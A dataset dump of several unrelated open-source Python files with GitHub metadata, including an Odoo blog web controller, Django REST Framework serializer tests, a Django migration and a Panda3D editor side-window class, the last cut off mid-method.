text
stringlengths 4
1.02M
| meta
dict |
---|---|
from __future__ import absolute_import, unicode_literals
from sys import platform
def get_pytify_class_by_platform():
if 'linux' in platform:
from spotiplay.linux import Linux
return Linux
elif 'darwin' in platform:
from spotiplay.darwin import Darwin
return Darwin
else:
raise Exception('%s is not supported.' % platform)
| {
"content_hash": "da45f3d8985cc36f8f9e0c1e855c1c24",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 58,
"avg_line_length": 25.266666666666666,
"alnum_prop": 0.6701846965699209,
"repo_name": "jaruserickson/spotiplay",
"id": "769b7f036c9ee53924119d31ae911cfbf88d9109",
"size": "379",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spotiplay/strategy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30689"
}
],
"symlink_target": ""
} |
import datetime
import werkzeug
from openerp import tools
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.addons.website.models.website import slug
from openerp.osv.orm import browse_record
from openerp.tools.translate import _
from openerp import SUPERUSER_ID
from openerp.tools import html2plaintext
class QueryURL(object):
def __init__(self, path='', path_args=None, **args):
self.path = path
self.args = args
self.path_args = set(path_args or [])
def __call__(self, path=None, path_args=None, **kw):
path = path or self.path
for k, v in self.args.items():
kw.setdefault(k, v)
path_args = set(path_args or []).union(self.path_args)
paths, fragments = [], []
for key, value in kw.items():
if value and key in path_args:
if isinstance(value, browse_record):
paths.append((key, slug(value)))
else:
paths.append((key, value))
elif value:
if isinstance(value, list) or isinstance(value, set):
fragments.append(werkzeug.url_encode([(key, item) for item in value]))
else:
fragments.append(werkzeug.url_encode([(key, value)]))
for key, value in paths:
path += '/' + key + '/%s' % value
if fragments:
path += '?' + '&'.join(fragments)
return path
class WebsiteBlog(http.Controller):
_blog_post_per_page = 20
_post_comment_per_page = 10
def nav_list(self):
blog_post_obj = request.registry['blog.post']
groups = blog_post_obj.read_group(
request.cr, request.uid, [], ['name', 'create_date'],
groupby="create_date", orderby="create_date desc", context=request.context)
for group in groups:
begin_date = datetime.datetime.strptime(group['__domain'][0][2], tools.DEFAULT_SERVER_DATETIME_FORMAT).date()
end_date = datetime.datetime.strptime(group['__domain'][1][2], tools.DEFAULT_SERVER_DATETIME_FORMAT).date()
group['date_begin'] = '%s' % datetime.date.strftime(begin_date, tools.DEFAULT_SERVER_DATE_FORMAT)
group['date_end'] = '%s' % datetime.date.strftime(end_date, tools.DEFAULT_SERVER_DATE_FORMAT)
return groups
@http.route([
'/blog',
'/blog/page/<int:page>',
], type='http', auth="public", website=True)
def blogs(self, page=1, **post):
cr, uid, context = request.cr, request.uid, request.context
blog_obj = request.registry['blog.post']
total = blog_obj.search(cr, uid, [], count=True, context=context)
pager = request.website.pager(
url='/blog',
total=total,
page=page,
step=self._blog_post_per_page,
)
post_ids = blog_obj.search(cr, uid, [], offset=(page-1)*self._blog_post_per_page, limit=self._blog_post_per_page, context=context)
posts = blog_obj.browse(cr, uid, post_ids, context=context)
blog_url = QueryURL('', ['blog', 'tag'])
return request.website.render("website_blog.latest_blogs", {
'posts': posts,
'pager': pager,
'blog_url': blog_url,
})
@http.route([
'/blog/<model("blog.blog"):blog>',
'/blog/<model("blog.blog"):blog>/page/<int:page>',
'/blog/<model("blog.blog"):blog>/tag/<model("blog.tag"):tag>',
'/blog/<model("blog.blog"):blog>/tag/<model("blog.tag"):tag>/page/<int:page>',
], type='http', auth="public", website=True)
def blog(self, blog=None, tag=None, page=1, **opt):
""" Prepare all values to display the blog.
:return dict values: values for the templates, containing
- 'blog': current blog
- 'blogs': all blogs for navigation
- 'pager': pager of posts
- 'tag': current tag
- 'tags': all tags, for navigation
- 'nav_list': a dict [year][month] for archives navigation
- 'date': date_begin optional parameter, used in archives navigation
- 'blog_url': help object to create URLs
"""
date_begin, date_end = opt.get('date_begin'), opt.get('date_end')
cr, uid, context = request.cr, request.uid, request.context
blog_post_obj = request.registry['blog.post']
blog_obj = request.registry['blog.blog']
blog_ids = blog_obj.search(cr, uid, [], order="create_date asc", context=context)
blogs = blog_obj.browse(cr, uid, blog_ids, context=context)
domain = []
if blog:
domain += [('blog_id', '=', blog.id)]
if tag:
domain += [('tag_ids', 'in', tag.id)]
if date_begin and date_end:
domain += [("create_date", ">=", date_begin), ("create_date", "<=", date_end)]
blog_url = QueryURL('', ['blog', 'tag'], blog=blog, tag=tag, date_begin=date_begin, date_end=date_end)
post_url = QueryURL('', ['blogpost'], tag_id=tag and tag.id or None, date_begin=date_begin, date_end=date_end)
blog_post_ids = blog_post_obj.search(cr, uid, domain, order="create_date desc", context=context)
blog_posts = blog_post_obj.browse(cr, uid, blog_post_ids, context=context)
pager = request.website.pager(
url=blog_url(),
total=len(blog_posts),
page=page,
step=self._blog_post_per_page,
)
pager_begin = (page - 1) * self._blog_post_per_page
pager_end = page * self._blog_post_per_page
blog_posts = blog_posts[pager_begin:pager_end]
tag_obj = request.registry['blog.tag']
tag_ids = tag_obj.search(cr, uid, [], context=context)
tags = tag_obj.browse(cr, uid, tag_ids, context=context)
values = {
'blog': blog,
'blogs': blogs,
'tags': tags,
'tag': tag,
'blog_posts': blog_posts,
'pager': pager,
'nav_list': self.nav_list(),
'blog_url': blog_url,
'post_url': post_url,
'date': date_begin,
}
response = request.website.render("website_blog.blog_post_short", values)
return response
@http.route([
'''/blog/<model("blog.blog"):blog>/post/<model("blog.post", "[('blog_id','=',blog[0])]"):blog_post>''',
], type='http', auth="public", website=True)
def blog_post(self, blog, blog_post, tag_id=None, page=1, enable_editor=None, **post):
""" Prepare all values to display the blog.
:return dict values: values for the templates, containing
- 'blog_post': browse of the current post
- 'blog': browse of the current blog
- 'blogs': list of browse records of blogs
- 'tag': current tag, if tag_id in parameters
- 'tags': all tags, for tag-based navigation
- 'pager': a pager on the comments
- 'nav_list': a dict [year][month] for archives navigation
- 'next_post': next blog post, to direct the user towards the next interesting post
"""
cr, uid, context = request.cr, request.uid, request.context
tag_obj = request.registry['blog.tag']
blog_post_obj = request.registry['blog.post']
date_begin, date_end = post.get('date_begin'), post.get('date_end')
pager_url = "/blogpost/%s" % blog_post.id
pager = request.website.pager(
url=pager_url,
total=len(blog_post.website_message_ids),
page=page,
step=self._post_comment_per_page,
scope=7
)
pager_begin = (page - 1) * self._post_comment_per_page
pager_end = page * self._post_comment_per_page
comments = blog_post.website_message_ids[pager_begin:pager_end]
tag = None
if tag_id:
tag = request.registry['blog.tag'].browse(request.cr, request.uid, int(tag_id), context=request.context)
post_url = QueryURL('', ['blogpost'], blogpost=blog_post, tag_id=tag_id, date_begin=date_begin, date_end=date_end)
blog_url = QueryURL('', ['blog', 'tag'], blog=blog_post.blog_id, tag=tag, date_begin=date_begin, date_end=date_end)
if not blog_post.blog_id.id == blog.id:
return request.redirect("/blog/%s/post/%s" % (slug(blog_post.blog_id), slug(blog_post)))
tags = tag_obj.browse(cr, uid, tag_obj.search(cr, uid, [], context=context), context=context)
# Find next Post
visited_blogs = request.httprequest.cookies.get('visited_blogs') or ''
visited_ids = filter(None, visited_blogs.split(','))
visited_ids = map(lambda x: int(x), visited_ids)
if blog_post.id not in visited_ids:
visited_ids.append(blog_post.id)
next_post_id = blog_post_obj.search(cr, uid, [
('id', 'not in', visited_ids),
], order='ranking desc', limit=1, context=context)
if not next_post_id:
next_post_id = blog_post_obj.search(cr, uid, [('id', '!=', blog.id)], order='ranking desc', limit=1, context=context)
next_post = next_post_id and blog_post_obj.browse(cr, uid, next_post_id[0], context=context) or False
values = {
'tags': tags,
'tag': tag,
'blog': blog,
'blog_post': blog_post,
'main_object': blog_post,
'nav_list': self.nav_list(),
'enable_editor': enable_editor,
'next_post': next_post,
'date': date_begin,
'post_url': post_url,
'blog_url': blog_url,
'pager': pager,
'comments': comments,
}
response = request.website.render("website_blog.blog_post_complete", values)
response.set_cookie('visited_blogs', ','.join(map(str, visited_ids)))
request.session[request.session_id] = request.session.get(request.session_id, [])
if not (blog_post.id in request.session[request.session_id]):
request.session[request.session_id].append(blog_post.id)
# Increase counter
blog_post_obj.write(cr, SUPERUSER_ID, [blog_post.id], {
'visits': blog_post.visits+1,
},context=context)
return response
def _blog_post_message(self, user, blog_post_id=0, **post):
cr, uid, context = request.cr, request.uid, request.context
blog_post = request.registry['blog.post']
partner_obj = request.registry['res.partner']
if uid != request.website.user_id.id:
partner_ids = [user.partner_id.id]
else:
partner_ids = blog_post._find_partner_from_emails(
cr, SUPERUSER_ID, 0, [post.get('email')], context=context)
if not partner_ids or not partner_ids[0]:
partner_ids = [partner_obj.create(cr, SUPERUSER_ID, {'name': post.get('name'), 'email': post.get('email')}, context=context)]
message_id = blog_post.message_post(
cr, SUPERUSER_ID, int(blog_post_id),
body=post.get('comment'),
type='comment',
subtype='mt_comment',
author_id=partner_ids[0],
path=post.get('path', False),
context=dict(context, mail_create_nosubcribe=True))
return message_id
@http.route(['/blogpost/comment'], type='http', auth="public", methods=['POST'], website=True)
def blog_post_comment(self, blog_post_id=0, **post):
cr, uid, context = request.cr, request.uid, request.context
if post.get('comment'):
user = request.registry['res.users'].browse(cr, uid, uid, context=context)
blog_post = request.registry['blog.post']
blog_post.check_access_rights(cr, uid, 'read')
self._blog_post_message(user, blog_post_id, **post)
return werkzeug.utils.redirect(request.httprequest.referrer + "#comments")
def _get_discussion_detail(self, ids, publish=False, **post):
cr, uid, context = request.cr, request.uid, request.context
values = []
mail_obj = request.registry.get('mail.message')
for message in mail_obj.browse(cr, SUPERUSER_ID, ids, context=context):
values.append({
"id": message.id,
"author_name": message.author_id.name,
"author_image": message.author_id.image and \
("data:image/png;base64,%s" % message.author_id.image) or \
'/website_blog/static/src/img/anonymous.png',
"date": message.date,
'body': html2plaintext(message.body),
'website_published' : message.website_published,
'publish' : publish,
})
return values
@http.route(['/blogpost/post_discussion'], type='json', auth="public", website=True)
def post_discussion(self, blog_post_id, **post):
cr, uid, context = request.cr, request.uid, request.context
publish = request.registry['res.users'].has_group(cr, uid, 'base.group_website_publisher')
user = request.registry['res.users'].browse(cr, uid, uid, context=context)
id = self._blog_post_message(user, blog_post_id, **post)
return self._get_discussion_detail([id], publish, **post)
@http.route('/blogpost/new', type='http', auth="public", website=True)
def blog_post_create(self, blog_id, **post):
cr, uid, context = request.cr, request.uid, request.context
create_context = dict(context, mail_create_nosubscribe=True)
new_blog_post_id = request.registry['blog.post'].create(cr, uid, {
'blog_id': blog_id,
'name': _("Blog Post Title"),
'subtitle': _("Subtitle"),
'content': '',
'website_published': False,
}, context=create_context)
new_blog_post = request.registry['blog.post'].browse(cr, uid, new_blog_post_id, context=context)
return werkzeug.utils.redirect("/blog/%s/post/%s?enable_editor=1" % (slug(new_blog_post.blog_id), slug(new_blog_post)))
@http.route('/blogpost/duplicate', type='http', auth="public", website=True)
def blog_post_copy(self, blog_post_id, **post):
""" Duplicate a blog.
:param blog_post_id: id of the blog post currently browsed.
:return redirect to the new blog created
"""
cr, uid, context = request.cr, request.uid, request.context
create_context = dict(context, mail_create_nosubscribe=True)
nid = request.registry['blog.post'].copy(cr, uid, blog_post_id, {}, context=create_context)
new_blog_post = request.registry['blog.post'].browse(cr, uid, nid, context=context)
post = request.registry['blog.post'].browse(cr, uid, nid, context)
return werkzeug.utils.redirect("/blog/%s/post/%s?enable_editor=1" % (slug(post.blog_id), slug(new_blog_post)))
@http.route('/blogpost/get_discussion/', type='json', auth="public", website=True)
def discussion(self, post_id=0, path=None, count=False, **post):
cr, uid, context = request.cr, request.uid, request.context
mail_obj = request.registry.get('mail.message')
domain = [('res_id', '=', int(post_id)), ('model', '=', 'blog.post'), ('path', '=', path)]
#check current user belongs to website publisher group
publish = request.registry['res.users'].has_group(cr, uid, 'base.group_website_publisher')
if not publish:
domain.append(('website_published', '=', True))
ids = mail_obj.search(cr, SUPERUSER_ID, domain, count=count)
if count:
return ids
return self._get_discussion_detail(ids, publish, **post)
@http.route('/blogpost/get_discussions/', type='json', auth="public", website=True)
def discussions(self, post_id=0, paths=None, count=False, **post):
ret = []
for path in paths:
result = self.discussion(post_id=post_id, path=path, count=count, **post)
ret.append({"path": path, "val": result})
return ret
@http.route('/blogpost/change_background', type='json', auth="public", website=True)
def change_bg(self, post_id=0, image=None, **post):
if not post_id:
return False
return request.registry['blog.post'].write(request.cr, request.uid, [int(post_id)], {'background_image': image}, request.context)
@http.route('/blog/get_user/', type='json', auth="public", website=True)
def get_user(self, **post):
return [False if request.session.uid else True]
| {
"content_hash": "c1efdaca88a8bcb84b3afaaf6b36bcee",
"timestamp": "",
"source": "github",
"line_count": 359,
"max_line_length": 141,
"avg_line_length": 46.22562674094708,
"alnum_prop": 0.5854172943657728,
"repo_name": "diogocs1/comps",
"id": "12fd63f2fab6479d686bcf8754985dc04fd9ab62",
"size": "16620",
"binary": false,
"copies": "55",
"ref": "refs/heads/master",
"path": "web/addons/website_blog/controllers/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "701"
},
{
"name": "CSS",
"bytes": "856533"
},
{
"name": "HTML",
"bytes": "299671"
},
{
"name": "Java",
"bytes": "620166"
},
{
"name": "JavaScript",
"bytes": "5844302"
},
{
"name": "Makefile",
"bytes": "21002"
},
{
"name": "PHP",
"bytes": "14259"
},
{
"name": "Python",
"bytes": "10647376"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "17746"
},
{
"name": "XSLT",
"bytes": "120278"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('eventlog', '0029_auto_20180513_1045'),
]
operations = [
migrations.AlterField(
model_name='celerytaskprogress',
name='task_type',
field=models.IntegerField(default=0, choices=[(0, 'Bulk Site Upload'), (1, 'Multi User Assign Project'), (2, 'Multi User Assign Site'), (3, 'Report Generation'), (4, 'Site Import')]),
),
]
| {
"content_hash": "6b60a69d1bc419df36169bcd5ecf503f",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 195,
"avg_line_length": 29.944444444444443,
"alnum_prop": 0.614100185528757,
"repo_name": "awemulya/fieldsight-kobocat",
"id": "d50a871992da1f720f7a4fdb82aa552f5a054fd0",
"size": "563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "onadata/apps/eventlog/migrations/0030_auto_20180806_1523.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "70153"
},
{
"name": "Dockerfile",
"bytes": "2462"
},
{
"name": "HTML",
"bytes": "1488442"
},
{
"name": "JavaScript",
"bytes": "674757"
},
{
"name": "Makefile",
"bytes": "2286"
},
{
"name": "Python",
"bytes": "5340355"
},
{
"name": "Shell",
"bytes": "16493"
}
],
"symlink_target": ""
} |
"""
test_in_serializers
-------------------
Tests of the fields cooperation in the serializer interfaces for serialization, de-serialization,
and validation.
"""
from . import test_settings
from rest_framework import serializers
from drf_compound_fields.fields import DictField
from drf_compound_fields.fields import ListField
from drf_compound_fields.fields import ListOrItemField
class ListSerializer(serializers.Serializer):
emails = ListField(child=serializers.EmailField(), required=False)
class EmbeddedSerializer(serializers.Serializer):
value = serializers.EmailField()
class ContainerListSerializer(serializers.Serializer):
embedded = ListField(child=EmbeddedSerializer())
class ContainerSerializer(serializers.Serializer):
embedded = ListOrItemField(child=EmbeddedSerializer())
class ListOrItemKwArgsSerializer(serializers.Serializer):
authors = ListOrItemField(
child=serializers.IntegerField(),
required=False
)
class DictSerializer(serializers.Serializer):
emails = DictField(child=serializers.EmailField(), required=False)
def test_non_list():
serializer = ListSerializer(data={'emails': 'notAList'})
assert not serializer.is_valid(), 'Non-list value should not be allowed'
assert 'emails' in serializer.errors, 'Non-list value should produce a field error'
assert serializer.errors['emails'], 'Non-list value error should be non-empty'
def test_invalid_list_item():
serializer = ListSerializer(data={'emails': ['[email protected]', 'notAnEmail']})
assert not serializer.is_valid(), 'Invalid list-item should not be allowed'
assert 'emails' in serializer.errors, 'Invalid list-item should produce a field error'
assert serializer.errors['emails'], 'Invalid list-item errors should be non-empty {0}'.format(
serializer.errors['emails'])
def test_invalid_embedded_list():
assert not ContainerSerializer(data={'embedded': [{'value': 'notAnInteger'}]}).is_valid()
def test_invalid_embedded_item():
assert not ContainerSerializer(data={'embedded': {'value': 'notAnInteger'}}).is_valid()
def test_empty_list():
serializer = ListSerializer(data={'emails': []})
assert serializer.is_valid(), 'Empty list should be allowed'
def test_valid_list():
serializer = ListSerializer(data={'emails': ['[email protected]']})
assert serializer.is_valid(), 'Valid list should be allowed'
def test_invalid_list_embedded():
serializer = ContainerListSerializer(data={'embedded': [{'value': 'text'}]})
assert not serializer.is_valid(), 'List field should be invalid'
assert 'embedded' in serializer.errors, 'Invalid field value should produce a field error'
def test_non_dict():
serializer = DictSerializer(data={'emails': 'notADict'})
assert not serializer.is_valid(), 'Non-dict value should not be allowed'
assert 'emails' in serializer.errors, 'Non-dict value should produce a field error'
assert serializer.errors['emails'], 'Non-dict value error should be non-empty'
def test_invalid_dict_value():
serializer = DictSerializer(data={'emails': {'a': '[email protected]',
'b': 'notAnEmail'}})
assert not serializer.is_valid(), 'Invalid dict-value should not be allowed'
assert 'emails' in serializer.errors, 'Invalid dict-value should produce a field error'
assert serializer.errors['emails'], 'Invalid dict-value errors should be non-empty {0}'.format(
serializer.errors['emails'])
def test_empty_dict():
serializer = DictSerializer(data={'emails': {}})
assert serializer.is_valid(), 'Empty dict should be allowed'
def test_valid_dict():
serializer = DictSerializer(data={'emails': {'a': '[email protected]'}})
assert serializer.is_valid(), 'Valid dict shouild be allowed'
def test_list_or_item_kwargs():
serializer = ListOrItemKwArgsSerializer(data={'authors': []})
assert serializer.is_valid(), 'Optional list-or-item should allow empty list: {0}'.format(
serializer.errors
)
| {
"content_hash": "c92a40416fdd3c566588b424dca15d38",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 99,
"avg_line_length": 34.991379310344826,
"alnum_prop": 0.7166789849716679,
"repo_name": "estebistec/drf-compound-fields",
"id": "d6301309c6b0d5401fc6f4109be5c12243f083ad",
"size": "4107",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_in_serializers.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1230"
},
{
"name": "Python",
"bytes": "20049"
}
],
"symlink_target": ""
} |
def import_1():
from m_module import func
from n_module import func
func()
def import_2():
import m_module, n_module
m_module.func()
n_module.func()
def import_3():
from m_module import func as mfunc
from n_module import func as nfunc
mfunc(); nfunc()
if __name__ == '__main__':
import_1()
import_2()
import_3()
| {
"content_hash": "72f50ac210bb4530bf6b147def4d44a1",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 38,
"avg_line_length": 19.105263157894736,
"alnum_prop": 0.5922865013774105,
"repo_name": "ordinary-developer/education",
"id": "50c6a0dd52810e362efd10adf1c02900b7155cc4",
"size": "363",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_23-coding_basics/08-import_is_required/main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2435"
},
{
"name": "C",
"bytes": "109331"
},
{
"name": "C#",
"bytes": "163418"
},
{
"name": "C++",
"bytes": "2504348"
},
{
"name": "CMake",
"bytes": "24185"
},
{
"name": "GLSL",
"bytes": "10134"
},
{
"name": "HTML",
"bytes": "58556"
},
{
"name": "JavaScript",
"bytes": "46010"
},
{
"name": "Makefile",
"bytes": "748"
},
{
"name": "Python",
"bytes": "189834"
},
{
"name": "QML",
"bytes": "191657"
},
{
"name": "QMake",
"bytes": "265220"
},
{
"name": "Scheme",
"bytes": "32484"
},
{
"name": "Shell",
"bytes": "2412"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('customers', '0009_recipient_type'),
]
operations = [
migrations.AlterModelOptions(
name='recipient',
options={'ordering': ['last_name'], 'verbose_name_plural': 'Recipients'},
),
]
| {
"content_hash": "bf98bd15a9983fc76f515af3eca56cad",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 85,
"avg_line_length": 22.823529411764707,
"alnum_prop": 0.6082474226804123,
"repo_name": "davogler/POSTv3",
"id": "a0b8c1226a17d261ff2955178936b14b9e5fc04e",
"size": "412",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "customers/migrations/0010_auto_20170124_2322.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "144324"
},
{
"name": "HTML",
"bytes": "282463"
},
{
"name": "JavaScript",
"bytes": "244051"
},
{
"name": "Python",
"bytes": "358932"
}
],
"symlink_target": ""
} |
"""This provides a lineno() function to make it easy to grab the line
number that we're on.
Danny Yoo ([email protected])
"""
import inspect
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
if __name__ == '__main__':
print "hello, this is line number", lineno()
print
print
print "and this is line", lineno()
| {
"content_hash": "3b44a0484ae1b290a6774800ea00ef49",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 69,
"avg_line_length": 24.294117647058822,
"alnum_prop": 0.6585956416464891,
"repo_name": "ActiveState/code",
"id": "9a7e327ab03e6663d207e6e3ae3dbb00f78d93f8",
"size": "413",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipes/Python/145297_Grabbing_current_line_number/recipe-145297.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "35894"
},
{
"name": "C",
"bytes": "56048"
},
{
"name": "C++",
"bytes": "90880"
},
{
"name": "HTML",
"bytes": "11656"
},
{
"name": "Java",
"bytes": "57468"
},
{
"name": "JavaScript",
"bytes": "181218"
},
{
"name": "PHP",
"bytes": "250144"
},
{
"name": "Perl",
"bytes": "37296"
},
{
"name": "Perl 6",
"bytes": "9914"
},
{
"name": "Python",
"bytes": "17387779"
},
{
"name": "Ruby",
"bytes": "40233"
},
{
"name": "Shell",
"bytes": "190732"
},
{
"name": "Tcl",
"bytes": "674650"
}
],
"symlink_target": ""
} |
from direct.tkwidgets.AppShell import AppShell
from direct.tkwidgets.VectorWidgets import ColorEntry
from direct.showbase.TkGlobal import spawnTkLoop
import seSceneGraphExplorer
import Pmw, sys
if sys.version_info >= (3, 0):
from tkinter import Frame, IntVar, Checkbutton, Toplevel
import tkinter
else:
from Tkinter import Frame, IntVar, Checkbutton, Toplevel
import Tkinter as tkinter
class sideWindow(AppShell):
#################################################################
# sideWindow(AppShell)
# This class will open a side window wich contains a scene graph and
# a world setting page.
#################################################################
appversion = '1.0'
appname = 'Navigation Window'
frameWidth = 325
frameHeight = 580
frameIniPosX = 0
frameIniPosY = 110
padx = 0
pady = 0
lightEnable = 0
ParticleEnable = 0
basedriveEnable = 0
collision = 0
backface = 0
texture = 1
wireframe = 0
enableBaseUseDrive = 0
def __init__(self, worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
backface, texture, wireframe, grid, widgetVis, enableAutoCamera, parent = None, nodePath = render, **kw):
self.worldColor = worldColor
self.lightEnable = lightEnable
self.ParticleEnable = ParticleEnable
self.basedriveEnable = basedriveEnable
self.collision = collision
self.backface = backface
self.texture = texture
self.wireframe = wireframe
self.grid = grid
self.enableAutoCamera = enableAutoCamera
self.widgetVis = widgetVis
# Define the megawidget options.
optiondefs = (
('title', self.appname, None),
)
self.defineoptions(kw, optiondefs)
if parent == None:
self.parent = Toplevel()
else:
self.parent = parent
AppShell.__init__(self, self.parent)
self.parent.geometry('%dx%d+%d+%d' % (self.frameWidth, self.frameHeight,self.frameIniPosX,self.frameIniPosY))
self.parent.resizable(False,False) ## Disable the ability to resize for this Window.
def appInit(self):
print('----SideWindow is Initialized!!')
def createInterface(self):
# The interior of the toplevel panel
interior = self.interior()
mainFrame = Frame(interior)
## Creat NoteBook
self.notebookFrame = Pmw.NoteBook(mainFrame)
self.notebookFrame.pack(fill=tkinter.BOTH,expand=1)
sgePage = self.notebookFrame.add('Tree Graph')
envPage = self.notebookFrame.add('World Setting')
self.notebookFrame['raisecommand'] = self.updateInfo
## Tree Grapgh Page
self.SGE = seSceneGraphExplorer.seSceneGraphExplorer(
sgePage, nodePath = render,
scrolledCanvas_hull_width = 270,
scrolledCanvas_hull_height = 570)
self.SGE.pack(fill = tkinter.BOTH, expand = 0)
## World Setting Page
envPage = Frame(envPage)
pageFrame = Frame(envPage)
self.LightingVar = IntVar()
self.LightingVar.set(self.lightEnable)
self.LightingButton = Checkbutton(
pageFrame,
text = 'Enable Lighting',
variable = self.LightingVar,
command = self.toggleLights)
self.LightingButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.CollisionVar = IntVar()
self.CollisionVar.set(self.collision)
self.CollisionButton = Checkbutton(
pageFrame,
text = 'Show Collision Object',
variable = self.CollisionVar,
command = self.showCollision)
self.CollisionButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.ParticleVar = IntVar()
self.ParticleVar.set(self.ParticleEnable)
self.ParticleButton = Checkbutton(
pageFrame,
text = 'Show Particle Dummy',
variable = self.ParticleVar,
command = self.enableParticle)
self.ParticleButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.baseUseDriveVar = IntVar()
self.baseUseDriveVar.set(self.basedriveEnable)
self.baseUseDriveButton = Checkbutton(
pageFrame,
text = 'Enable base.usedrive',
variable = self.baseUseDriveVar,
command = self.enablebaseUseDrive)
self.baseUseDriveButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.backfaceVar = IntVar()
self.backfaceVar.set(self.backface)
self.backfaceButton = Checkbutton(
pageFrame,
text = 'Enable BackFace',
variable = self.backfaceVar,
command = self.toggleBackface)
self.backfaceButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.textureVar = IntVar()
self.textureVar.set(self.texture)
self.textureButton = Checkbutton(
pageFrame,
text = 'Enable Texture',
variable = self.textureVar,
command = self.toggleTexture)
self.textureButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.wireframeVar = IntVar()
self.wireframeVar.set(self.wireframe)
self.wireframeButton = Checkbutton(
pageFrame,
text = 'Enable Wireframe',
variable = self.wireframeVar,
command = self.toggleWireframe)
self.wireframeButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.gridVar = IntVar()
self.gridVar.set(self.grid)
self.gridButton = Checkbutton(
pageFrame,
text = 'Enable Grid',
variable = self.gridVar,
command = self.toggleGrid)
self.gridButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.widgetVisVar = IntVar()
self.widgetVisVar.set(self.widgetVis)
self.widgetVisButton = Checkbutton(
pageFrame,
text = 'Enable WidgetVisible',
variable = self.widgetVisVar,
command = self.togglewidgetVis)
self.widgetVisButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.enableAutoCameraVar = IntVar()
self.enableAutoCameraVar.set(self.enableAutoCamera)
self.enableAutoCameraButton = Checkbutton(
pageFrame,
text = 'Enable Auto Camera Movement for Loading Objects',
variable = self.enableAutoCameraVar,
command = self.toggleAutoCamera)
self.enableAutoCameraButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.backgroundColor = ColorEntry(
pageFrame, text = 'BG Color', value=self.worldColor)
self.backgroundColor['command'] = self.setBackgroundColorVec
self.backgroundColor['resetValue'] = [0,0,0,0]
self.backgroundColor.pack(side=tkinter.LEFT, expand=False)
self.bind(self.backgroundColor, 'Set background color')
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
envPage.pack(expand=False)
## Set all stuff done
self.notebookFrame.setnaturalsize()
mainFrame.pack(fill = 'both', expand = 1)
def createMenuBar(self):
# We don't need menu bar here.
self.menuBar.destroy()
def onDestroy(self, event):
#################################################################
# onDestroy(self, event)
# This function will be called when user closed the side window.
# Here we will send out a message with whole data set we will need
# for the next time user open the side window.
#################################################################
messenger.send('SW_close',[self.worldColor,
self.lightEnable,
self.ParticleEnable,
self.basedriveEnable,
self.collision,
self.backface,
self.texture,
self.wireframe,
self.grid,
self.widgetVis,
self.enableAutoCamera])
'''
If you have open any thing, please rewrite here!
'''
pass
###############################
def updateInfo(self, page = 'Tree Graph'):
#################################################################
# updateInfo(self, page = 'Tree Graph')
# This function will be called when each time user change the main
# page of the window.
# What it dose is to call right function to restore the data for current selected page.
#################################################################
if page=='Tree Graph':
self.updateTreeGraph()
elif page == 'World Setting':
self.updateWorldSetting()
def updateTreeGraph(self):
#################################################################
# updateTreeGraph(self)
# When scene graoh page has been opend, call sceneGraphExplorer to
# updata the tree.
#################################################################
self.SGE.update()
pass
def updateWorldSetting(self):
#################################################################
# updateWorldSetting(self)
# When world setting page has been selected, this function will
# reset those check box in the page to reflect the current world setting.
#################################################################
self.LightingVar.set(self.lightEnable)
self.CollisionVar.set(self.collision)
